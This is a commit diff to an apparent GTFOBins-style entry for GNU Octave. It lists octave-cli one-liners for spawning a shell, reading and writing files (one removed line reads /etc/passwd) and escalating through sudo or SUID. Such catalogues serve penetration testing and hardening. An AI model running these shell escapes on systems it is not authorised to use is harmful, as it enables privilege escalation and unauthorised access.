Fix and improve TeX binaries and GNU Octave
This commit is contained in:
@@ -1,10 +1,14 @@
|
||||
---
|
||||
description: The payloads are compatible with GUI.
|
||||
functions:
|
||||
shell:
|
||||
- code: octave-cli --eval "system('/bin/sh')"
|
||||
- code: octave-cli --eval 'system("/bin/sh")'
|
||||
file-write:
|
||||
- code: poctave-cli --eval 'filename = "file_to_write"; fid = fopen (filename, "w"); fputs (fid, "DATA"); fclose (fid);'
|
||||
- code: octave-cli --eval 'filename = "file_to_write"; fid = fopen(filename, "w"); fputs(fid, "DATA"); fclose(fid);'
|
||||
file-read:
|
||||
- code: octave-cli --eval 'fid = fopen ("/etc/passwd"); while(!feof(fid)); txt = fgetl(fid), txt; endwhile; fclose (fid);'
|
||||
- code: octave-cli --eval 'format none; fid = fopen("file_to_read"); while(!feof(fid)); txt = fgetl(fid); disp(txt); endwhile; fclose(fid);'
|
||||
sudo:
|
||||
- code: sudo octave-cli --eval "system('/bin/sh')"
|
||||
- code: sudo octave-cli --eval 'system("/bin/sh")'
|
||||
limited-suid:
|
||||
- code: ./octave-cli --eval 'system("/bin/sh")'
|
||||
---
|
||||
|
||||
Reference in New Issue
Block a user